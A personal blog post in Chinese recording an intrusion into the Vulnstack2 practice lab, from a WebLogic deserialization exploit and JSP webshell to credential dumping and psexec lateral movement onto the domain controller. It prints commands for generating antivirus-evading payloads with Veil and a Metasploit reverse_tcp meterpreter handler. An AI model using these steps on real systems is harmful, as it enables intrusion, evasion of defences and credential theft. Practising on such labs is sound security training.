Vulnstack2渗透记录

环境搭建

下载环境并用vmware打开三台虚拟机WEB,PC和DC

首先进入以de1ay/1qaz@WSX登入WEB,手动以管理员身份开启C:\Oracle\Middleware\user_projects\domains\base_domain\bin\startweblogic

mssql/1qaz@WSX登入PC,在计算机右键->管理->配置->服务中开启computer browser,DC也一样

自此环境应该就搭建好了🧐

外网渗透

出口IP是192.168.111.80,拿到IP先用kali的nmap扫一下端口(这里kali的ip要和目标机器配在同一网段上)

nmap -sS -Pn 192.168.111.80

浏览器访问一下发现80是个空页面,倒是7001出来个这个东西

百度报错信息是weblogic,祭出weblogicscaner工具

 扫出来一堆,但看了不少wp的我决定用CVE-20019-2729打😛

当时想用git上面的python写的exp打,发现缺一个模块,pip install发现配的dns有问题,于是乎我又倒回去把静态ip改成了dhcp,后来又改了改dns,改完装完发现回不去了,往哪ping都是unreachable,经过一番n种胡乱操作,我的kali成功回到了快照状态

最后气急败坏的我冷静下来发现把入口机的ip换成自动获取开桥接,然后kali开桥接就ok了🤕

现在入口机的IP为192.168.2.200,好了开始用CVE打,这里用到github上找的java反序列化利用工具,可以直接执行命令

 首先上传一个jsp马,然后用冰蝎连接拿到webshell

 我的思路是直接上传文件cs上线,但是命令执行了等了巨长时间显示拒绝访问,联想到估计是360给拦住了,一看果然如此,尝试taskkill未果,那得想办法过360了

准备使用veil做免杀,kali中安装veil

git clone https://github.com/Veil-Framework/Veil
cd ./Veil/config
./setup.sh  --force --silent
apt install veil

使用veil生成免杀马

veil   #打开veil
use 1   #用evasion
list   #查看列表
use 17   #这里我用了一个go语言的免杀
generate

后面需要在cs里面生成一个veil的payload贴进去,最后生成一个exe用冰蝎传上去执行一下

麻了,没过去🤕

那好吧换个思路,看网上用veil配合msf能过掉360拿到meterpreter,那就这么干

veil   #打开veil
use 1   #用evasion
list   #查看列表
use 16   #这次选了个反向链接meterpreter的
set LHOST 192.168.2.243
set LPORT 8888
generate

打开msf监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.243
set LPORT 8888
run

然后冰蝎上传执行一下veil生成的exe

 草(一种植物)😠

整不会了,动态免杀过360这一块等会了再回来补充吧,手动上线了cs

直接右键提权拿到system权限

横向移动

域内基本信息搜集

有两块网卡,内网的网关是10.10.10.1

 

 hashdump和mimitakz抓密码

探测内网主机

 用portscan扫一下DC的端口

445开着,试试利用psexec横向移动到10.10.10.10,步骤如下:

首先新建一个beacon_smb的监听器,然后在目标列表右键->横向移动->psexec

 拿下

 还差一个201,还是先扫下端口

 故技重施拿下201

横向移动阶段快的让我有点发懵😲至此就算打完了(当个脚本小子真不戳)

总结

还是很有收获的,只是横向移动阶段比起我预想的有点草率,再就是动态免杀过360没能搞定

继续努力咯🙄

posted @ 2022-01-06 10:42  Yu_so1dier0n  阅读(565)  评论(0编辑  收藏  举报